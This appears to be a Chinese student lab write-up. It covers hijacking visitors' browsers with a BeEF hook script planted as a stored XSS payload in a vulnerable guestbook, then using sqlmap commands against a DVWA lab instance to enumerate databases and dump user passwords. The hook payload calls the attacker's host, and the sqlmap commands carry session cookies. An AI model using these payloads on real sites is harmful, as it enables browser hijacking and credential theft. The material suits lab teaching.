第一部分:XSS用Beef劫持被攻击者客户端浏览器。
实验环境搭建。
角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)
攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);
被攻击者:访问留言簿网站,浏览器被劫持。
利用AWVS扫描留言簿网站(安装见参考文档0.AWVS安装与使用.docx),发现其存在XSS漏洞,截图。
kali和靶机都采用桥接模式。然后让kali和受害者连接同一个手机热点!!
IIS服务器配置情况:
把访问的默认界面设置为:Message.asp
ip分配情况:
使用AWVS扫描发现有XSS漏洞
Kali使用beef生成恶意代码,截图。
在kali上先安装beef-xss
然后输入命令:
beef-xss
访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板,
<script src="http://Kali的IP地址:3000/hook.js"></script>
<script src="http://Kali的IP地址:3000/hook.js"></script>
管理员登录login.htm,账号密码均为admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为百度,将你在beff中的配置截图。
受害者页面:为百度的主页面(放不了图)
让受害者屏幕弹出字体
beef-xss配置:
受害者视角:
SQL部分:
1.注入点发现
输入1',出现报错,判断存在注入漏洞
2.枚举当前使用的数据库名称和用户名。
使用sqlmap
输入命令:
sqlmap -u "URL" --cookie="COOKIE的值" --current -db(当前数据库名称) --current-user(当前用户名称)
URL和COOKIE的值需要根据需求更改
sqlmap -u "http://192.168.159.145/dvwa/vulnerabilities/sqli/?id=1212&Submit=Submit#" --cookie="PHPSESSID=c098eb10e92748a55c2e60c5ec1f57de;security=low" --current-db --current-user
3.枚举数据库用户名和密码
使用sqlmap
命令:
sqlmap -u "URL" --cookie='COOKIE的值' -D 数据库名称 --string="Surname" --users --password
sqlmap -u "http://192.168.159.145/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=c098eb10e92748a55c2e60c5ec1f57de' -D dvwa --string="Surname" --users --password
4.枚举数据库
sqlmap命令:
sqlmap -u "URL"--cookie="COOKIE的值" --dbs (查询当前数据库)
sqlmap -u "http://192.168.159.145/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"--cookie="security=low;PHPSESSID=c098eb10e92748a55c2e60c5ec1f57de" --dbs
5.枚举数据库和指定数据库的数据表
sqlmap命令:
sqlmap -u "URL" --cookie="COOKIE的值" -D dvwa(数据库名) --tables
sqlmap -u "http://192.168.159.145/dvwa/vulnerabilities/sqli/?id=1212&Submit=Submit#" --cookie="PHPSESSID=c098eb10e92748a55c2e60c5ec1f57de;security=low" -D dvwa --tables
6.获取指定数据库和表中所有列的信息
这里选择爆users表中的所有列
sqlmap命令:
sqlmap -u "URL" --cookie="COOKIE的值" -D dvwa(数据库名称) -T users (表的名称)--columns
sqlmap -u "http://192.168.159.145/dvwa/vulnerabilities/sqli/?id=1212&Submit=Submit#" --cookie="PHPSESSID=c098eb10e92748a55c2e60c5ec1f57de;security=low" -D dvwa -T users --columns
7.枚举指定数据表中的所有用户名与密码,并down到本地。
sqlmap命令:
sqlmap -u "URL" --cookie="COOKIE的值" -D dvwa(数据库名称) -T users(表的名称) -C user,password(求的字段名称) --dump
sqlmap -u "http://192.168.159.145/dvwa/vulnerabilities/sqli/?id=1212&Submit=Submit#" --cookie="PHPSESSID=c098eb10e92748a55c2e60c5ec1f57de;security=low" -D dvwa -T users -C user,password --dump